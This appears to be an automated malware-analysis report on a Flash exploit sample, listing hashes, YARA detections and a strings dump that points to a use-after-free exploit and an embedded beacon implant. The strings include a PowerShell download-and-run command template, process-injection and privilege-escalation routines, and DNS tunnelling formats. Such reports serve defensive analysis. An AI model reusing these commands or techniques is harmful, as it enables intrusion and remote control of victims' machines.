Sample details: add01ee7e871530c6f8621435b5bd862

Hashes
MD5: add01ee7e871530c6f8621435b5bd862
SHA1: d213e21168790f496a08427f9f58559b9b980cd7
SHA256: 4b4b7985fdb963e8b27abcf3b32b83fa7d2fc2398e6c59bef52bf6c03ab376f4
SSDEEP: 3072:Njh9N4a1j712h9Td2+1lxvTeZna8xUhUbT15Qwxhp:NjdFKdoSxvixTxUAzJ
Details
File Type: data
Yara Hits
CuckooSandbox/shellcode | CuckooSandbox/embedded_pe | CuckooSandbox/embedded_win_api | YRP/powershell | YRP/maldoc_find_kernel32_base_method_1 | YRP/maldoc_getEIP_method_1 | YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/ThreadControl__Context | YRP/anti_dbg | YRP/inject_thread | YRP/create_service | YRP/network_http | YRP/network_dns | YRP/escalate_priv | YRP/win_registry | YRP/win_token | YRP/win_files_operation | YRP/Prime_Constants_long | YRP/RijnDael_AES | YRP/BASE64_table | YRP/VC8_Random | YRP/Str_Win32_Winsock2_Library | YRP/Str_Win32_Wininet_Library | YRP/Str_Win32_Internet_API | YRP/Str_Win32_Http_API | FlorianRoth/PowerShell_Susp_Parameter_Combo | FlorianRoth/WiltedTulip_ReflectiveLoader |
Strings
		<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
    <rdf:Description xmlns:dc="http://purl.org/dc/elements/1.1" rdf:about="">
        <dc:format>application/x-shockwave-flash</dc:format>
        <dc:title>Adobe Flex 4 Application</dc:title>
        <dc:description>http://www.adobe.com/products/flex</dc:description>
        <dc:publisher>unknown</dc:publisher>
        <dc:creator>unknown</dc:creator>
        <dc:language>EN</dc:language>
        <dc:date>Feb 6, 2018</dc:date>
    </rdf:Description> </rdf:RDF>
flash02
!This program cannot be run in DOS mode.
rERich
`.rdata
@.data
@.reloc
rijndael
CorExitProcess
runtime error 
TLOSS error
SING error
DOMAIN error
An application has made an attempt to load the C runtime library incorrectly.
Please contact the application's support team for more information.
- Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
- not enough space for locale information
- Attempt to initialize the CRT more than once.
This indicates a bug in your application.
- CRT not initialized
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
This application has requested the Runtime to terminate it in an unusual way.
Please contact the application's support team for more information.
- not enough space for environment
- not enough space for arguments
- floating point support not loaded
Microsoft Visual C++ Runtime Library
<program name unknown>
Runtime Error!
Program: 
(null)
`h````
xpxxxx
EncodePointer
DecodePointer
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
ADVAPI32.DLL
`h`hhh
xppwpp
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
UTF-16LE
UNICODE
Unknown Runtime Check Error
Stack memory around _alloca was corrupted
A local variable was used before it was initialized
Stack memory was corrupted
A cast to a smaller data type has caused a loss of data.  If this was intentional, you should mask the source of the cast with the appropriate bitmask.  For example:  
	char c = (i & 0xFF);
Changing the code in this way will not affect the quality of the resulting optimized code.
The value of ESP was not properly saved across a function call.  This is usually a result of calling a function declared with one calling convention with a function pointer declared with a different calling convention.
Stack around the variable '
' was corrupted.
The variable '
' is being used without being initialized.
Run-Time Check Failure #%d - %s
Unknown Module Name
Unknown Filename
Stack corrupted near unknown variable
Stack around _alloca corrupted
Local variable used before initialization
Stack memory corruption
Cast to smaller type causing loss of data
Stack pointer corruption
GetProcessWindowStation
GetUserObjectInformationA
GetLastActivePopup
GetActiveWindow
MessageBoxA
USER32.DLL
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
MSPDB80.DLL
EnvironmentDirectory
SOFTWARE\Microsoft\VisualStudio\9.0\Setup\VS
RegCloseKey
RegQueryValueExA
RegOpenKeyExA
PDBOpenValidate5
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
CONOUT$
cdn.%x%x.%s
www6.%x%x.%s
%s.1%x.%x%x.%s
%s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s
%s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.1%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.1%08x%08x%08x%08x%08x.%x%x.%s
%s.1%08x%08x%08x%08x.%x%x.%s
%s.1%08x%08x%08x.%x%x.%s
%s.1%08x%08x.%x%x.%s
%s.1%08x.%x%x.%s
api.%x%x.%s
unknown
could not run command (w/ token) because of its length of %d bytes!
could not spawn %s (token): %d
could not spawn %s: %d
Could not open process token: %d (%u)
could not run %s as %s\%s: %d
COMSPEC
could not upload file: %d
could not open %s: %d
could not get file time: %d
could not set file time: %d
127.0.0.1
Could not connect to pipe (%s): %d
Could not open service control manager on %s: %d
Could not create service %s on %s: %d
Could not start service %s on %s: %d
Started service %s on %s
Could not query service %s on %s: %d
Could not delete service %s on %s: %d
SeDebugPrivilege
SeTcbPrivilege
SeCreateTokenPrivilege
SeAssignPrimaryTokenPrivilege
SeLockMemoryPrivilege
SeIncreaseQuotaPrivilege
SeUnsolicitedInputPrivilege
SeMachineAccountPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeProfileSingleProcessPrivilege
SeIncreaseBasePriorityPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeShutdownPrivilege
SeAuditPrivilege
SeSystemEnvironmentPrivilege
SeChangeNotifyPrivilege
SeRemoteShutdownPrivilege
SeUndockPrivilege
SeSyncAgentPrivilege
SeEnableDelegationPrivilege
SeManageVolumePrivilege
Could not create service: %d
Could not start service: %d
Failed to impersonate token: %d
Failed to get token
IsWow64Process
kernel32
Could not open '%s'
copy failed: %d
move failed: %d
D	0	%02d/%02d/%02d %02d:%02d:%02d	%s
F	%I64d	%02d/%02d/%02d %02d:%02d:%02d	%s
Wow64DisableWow64FsRedirection
Wow64RevertWow64FsRedirection
ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.
could not allocate %d bytes in process: %d
could not write to process memory: %d
could not adjust permissions in process: %d
could not create remote thread in %d: %d
could not open process %d: %d
%d is an x64 process (can't inject x86 content)
%d is an x86 process (can't inject x64 content)
syswow64
system32
Could not set PPID to %d: %d
Could not set PPID to %d
NtQueueApcThread
process
Could not connect to pipe: %d
%d	%d	%s
Kerberos
kerberos ticket purge failed: %08x
kerberos ticket use failed: %08x
could not connect to pipe: %d
could not connect to pipe
Maximum links reached. Disconnect one
%d	%d	%d.%d	%s	%s	%s	%d	%d
Could not bind to %d
IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
%%IMPORT%%
Command length (%d) too long
IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
powershell -nop -exec bypass -EncodedCommand "%s"
?%s=%s
%s&%s=%s
%s%s: %s
Could not kill %d: %d
%s	%d	%d
%s	%d	%d	%s	%s	%d
sha256
abcdefghijklmnop
could not create pipe: %d
I'm already in SMB mode
%s (admin)
Could not open process: %d (%u)
Failed to impersonate token from %d (%u)
Failed to duplicate primary token for %d (%u)
Failed to impersonate logged on user %d (%u)
Could not create token: %d
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: %d
Microsoft Base Cryptographic Provider v1.0
?456789:;<=
 !"#$%&'()*+,-./0123
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq
LibTomMath
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/
GetTickCount
GetLocalTime
GetCurrentProcessId
CreateFileA
WaitForSingleObject
SetFileTime
WriteFile
OpenProcess
CreateProcessA
GetEnvironmentVariableA
DisconnectNamedPipe
FlushFileBuffers
SetCurrentDirectoryA
GetStartupInfoA
GetLastError
GetCurrentDirectoryW
CreatePipe
GetCurrentDirectoryA
GetFileTime
CloseHandle
GetCurrentProcess
ConnectNamedPipe
GetCurrentThread
ReadFile
GetProcAddress
CreateNamedPipeA
GetModuleHandleA
GetVersionExA
CreateThread
GetFullPathNameA
SystemTimeToTzSpecificLocalTime
GetLogicalDrives
ExpandEnvironmentStringsA
GetFileAttributesA
FileTimeToSystemTime
FindFirstFileA
CopyFileA
FindClose
MoveFileA
FindNextFileA
DeleteProcThreadAttributeList
HeapAlloc
UpdateProcThreadAttribute
HeapFree
GetProcessHeap
CreateRemoteThread
VirtualAlloc
VirtualProtectEx
VirtualAllocEx
ProcessIdToSessionId
VirtualProtect
DuplicateHandle
InitializeProcThreadAttributeList
WriteProcessMemory
GetThreadContext
SetThreadContext
FreeLibrary
VirtualFree
Thread32First
Thread32Next
SetLastError
LoadLibraryA
OpenThread
CreateToolhelp32Snapshot
SuspendThread
ResumeThread
PeekNamedPipe
WaitNamedPipeA
SetNamedPipeHandleState
LocalAlloc
LocalFree
GetComputerNameA
Process32First
TerminateProcess
Process32Next
KERNEL32.dll
CreateProcessAsUserA
CloseServiceHandle
OpenProcessToken
CreateProcessWithLogonW
DeleteService
CreateServiceA
StartServiceA
CreateProcessWithTokenW
QueryServiceStatus
OpenSCManagerA
OpenServiceA
OpenThreadToken
LookupPrivilegeValueA
ImpersonateLoggedOnUser
ImpersonateNamedPipeClient
QueryServiceStatusEx
ControlService
AdjustTokenPrivileges
GetUserNameA
InitializeSecurityDescriptor
SetSecurityDescriptorDacl
GetTokenInformation
LookupAccountSidA
DuplicateTokenEx
AllocateAndInitializeSid
RevertToSelf
FreeSid
CheckTokenMembership
LogonUserA
ADVAPI32.dll
HttpQueryInfoA
InternetConnectA
InternetQueryDataAvailable
InternetReadFile
InternetSetOptionA
HttpOpenRequestA
HttpSendRequestA
InternetOpenA
InternetCloseHandle
InternetQueryOptionA
WININET.dll
WS2_32.dll
DnsQuery_A
DnsFree
DNSAPI.dll
GetIfEntry
GetIpAddrTable
IPHLPAPI.DLL
LsaLookupAuthenticationPackage
LsaConnectUntrusted
LsaCallAuthenticationPackage
Secur32.dll
GetModuleHandleW
ExitProcess
MultiByteToWideChar
DeleteFileA
CreateDirectoryA
RemoveDirectoryA
GetCurrentThreadId
GetCommandLineA
GetSystemTimeAsFileTime
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
HeapCreate
HeapDestroy
DeleteCriticalSection
LeaveCriticalSection
EnterCriticalSection
HeapReAlloc
GetStdHandle
GetModuleFileNameA
TlsGetValue
TlsAlloc
TlsSetValue
TlsFree
InterlockedIncrement
InterlockedDecrement
InitializeCriticalSectionAndSpinCount
GetCPInfo
GetACP
GetOEMCP
IsValidCodePage
RtlUnwind
WideCharToMultiByte
GetConsoleCP
GetConsoleMode
SetHandleCount
GetFileType
SetFilePointer
FreeEnvironmentStringsA
GetEnvironmentStrings
FreeEnvironmentStringsW
GetEnvironmentStringsW
QueryPerformanceCounter
RaiseException
DebugBreak
HeapSize
GetLocaleInfoA
LCMapStringA
LCMapStringW
GetStringTypeA
GetStringTypeW
WriteConsoleA
GetConsoleOutputCP
WriteConsoleW
SetStdHandle
GetModuleFileNameW
VirtualQuery
SetEndOfFile
CompareStringA
CompareStringW
SetEnvironmentVariableA
CryptReleaseContext
CryptAcquireContextA
CryptGenRandom
SetEnvironmentVariableW
beacon.dll
_ReflectiveLoader@4
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>
shellcodBytes
MainExp
MainExp
data14
data15<C:\Users\Miha\AdobeMinePoC_tryingToEvadeSecSolutionsfla01.as
data3	ByteArray
flash.utils
Endian
LITTLE_ENDIAN
endian
Capabilities
flash.system
version
replace!http://adobe.com/AS3/2006/builtin
MainExp.as$0
flash.display:Sprite$flash.display:DisplayObjectContainer
flash.display:InteractiveObject
flash.display:DisplayObject
flash.events:EventDispatcher
Number
class_1
MainExp/MainExp
isDebugger
flash10
MainExp/flash21
__go_to_definition_help
flash21
flash.display
Sprite
Object
EventDispatcher
flash.events
DisplayObject
InteractiveObject
DisplayObjectContainer
__go_to_ctor_definition_help
flash.utils	ByteArray!http://adobe.com/AS3/2006/builtin	writeByte
toString
Object
String
name_2
name_1
shellcodBytes
:MainExp
UAFGenerator
MainExp:flash21
:MainExp/MainExp>
`)0` 0`!0`"0`#0`
]0]1J1
0^1`?a1G
UAFGenerator
;C:\Users\Miha\AdobeMinePoC_tryingToEvadeSecSolutionsfla0.as
flash0$0
param1
method_2
LocalConnection	flash.net
connect
var_13
DRM_obj
flash.utils
var_14
method_1
addEventListener
MainExp
flash0/flash0
data14
com.adobe.tvsdk.mediacore
PSDKEventDispatcher
createDispatcher
createMediaPlayer
var_15
var_16
drmManager
initialize
flash0/flash22
Capabilities
flash.system
isDebugger
flash24
flash25
flash0/flash23
flash.events
TimerEvent
Mem_Arr
var_17
length
flash26
var_18
Endian
LITTLE_ENDIAN
endian
Primit
flash20
flash0/flash24
flash21
flash0/flash25
__go_to_definition_help
MediaPlayer
Object
__go_to_ctor_definition_help
name_1
name_2
name_7
class_1
class_1!http://adobe.com/AS3/2006/builtin
UAFGenerator
:UAFGenerator
UAFGenerator:method_2
class_1.as$0
_loc1_
_loc2_
UAFGenerator:method_1
UAFGenerator:flash24
UAFGenerator:flash25
:UAFGenerator/UAFGenerator
+$activation
UAFGenerator.as$0
0]w`v0`vX
mx/core/IFlexAsset
BE:\dev\4.y\frameworks\projects\framework\src;mx\core;IFlexAsset.as
mx.core:IFlexAsset/IFlexAsset
mx.core
IFlexAsset
__go_to_definition_help
name_1
name_2
name_7
mx/core/ByteArrayAsset
mx.core:ByteArrayAsset
VERSION*http://www.adobe.com/2006/flex/mx/internal
4.6.0.23201
FE:\dev\4.y\frameworks\projects\framework\src;mx\core;ByteArrayAsset.as%mx.core:ByteArrayAsset/ByteArrayAsset
String
__go_to_definition_help
IFlexAsset
mx.core
ByteArrayAsset
flash.utils	ByteArray
Object
__go_to_ctor_definition_help
name_1
name_2
name_7
shellcodBytes
mx.core
ByteArrayAsset
Object	ByteArray
flash.utils
ExcludeClass
__go_to_ctor_definition_help
__go_to_definition_help
name_1
name_2
name_7!http://adobe.com/AS3/2006/builtin
shellcodBytes
:shellcodBytes
:shellcodBytes/shellcodBytes
flash3
"3DUfw
;C:\Users\Miha\AdobeMinePoC_tryingToEvadeSecSolutionsfla3.as
flash3/flash3
Number
flash27
Object
flash3/flash25
param1
flash3.as$109!http://adobe.com/AS3/2006/builtin
flash.utils:ByteArray
flash3/flash26
position
writeDouble
readUnsignedInt
flash3/flash27
__go_to_definition_help
flash25
flash26
flash.utils	ByteArray
__go_to_ctor_definition_help
name_1
name_2
name_7
Mem_Arr
Mem_Arr
f%]&f&
flash1
;C:\Users\Miha\AdobeMinePoC_tryingToEvadeSecSolutionsfla1.as
flash1/flash1
flash4
onDRMOperationComplete
flash28
flash1/onDRMOperationComplete
param1
param2
param3
param4
onDRMError
flash1/onDRMError
String
DRMOperationCompleteListener
com.adobe.tvsdk.mediacore
__go_to_definition_help
Object
__go_to_ctor_definition_help
name_1
name_2
name_7!http://adobe.com/AS3/2006/builtin
:onDRMOperationComplete
:onDRMError
DRM_obj
DRM_obj
DRM_obj
DRM_obj
0]<`:0`:X
Primit
Primit
flash21
flash39
flash27
flash70
Capabilities
flash.system
isDebugger
flash72
version
toUpperCase!http://adobe.com/AS3/2006/builtin
search
;C:\Users\Miha\AdobeMinePoC_tryingToEvadeSecSolutionsfla5.as
param1
position
readUnsignedInt
Primit/flash32
param2
writeUnsignedInt
Primit/flash34
Primit/flash35
Object
_loc2_
flash35
flash32
Primit.as$11
Primit/flash36	flash20$0
Mem_Arr
length
gadget
flash20
DRM_obj
Primit0
var_11
Primit/flash20
toString
Primit/hex
String
Primit/Primit
__go_to_definition_help
Boolean
flash34
flash36
method_3
__go_to_ctor_definition_help
name_1
name_2
name_7
var_19
var_19$
mx/core/mx_internal
CE:\dev\4.y\frameworks\projects\framework\src;mx\core;mx_internal.as
mx.core
mx_internal*http://www.adobe.com/2006/flex/mx/internal
name_1
name_2
name_7
gadget
gadget
Primit1
;C:\Users\Miha\AdobeMinePoC_tryingToEvadeSecSolutionsfla6.as
param1
gadget/flash1000
uint	gadget0$0
flash32
flash35
flash21
position
readUTFBytes
toLowerCase!http://adobe.com/AS3/2006/builtin
readUTF
var_12
gadget3
gadget/gadget0
param2
param3
_loc10_
_loc4_
_loc5_
_loc6_
_loc7_
_loc8_
_loc9_
_loc11_
_loc12_	flash1000
flash70
Vector
gadget.as$15
Primit
__AS3__.vec
flash34
flash36
gadget/gadget1	flash20$1	undefined
MainExp
data14
readUnsignedInt
length
method_4
method_5	flash2003	flash2005
gadget4
gadget7
gadget8
gadget9
res	flash2004
String
gadget/flash20
gadget/gadget
__go_to_definition_help
flash20
Object
__go_to_ctor_definition_help
name_1
name_2
name_7
kernel32.dll
virtualprotect
createprocessa
method_2
method_2
CreateProcessFunc
findfunc:
shellcodBytes
MainExp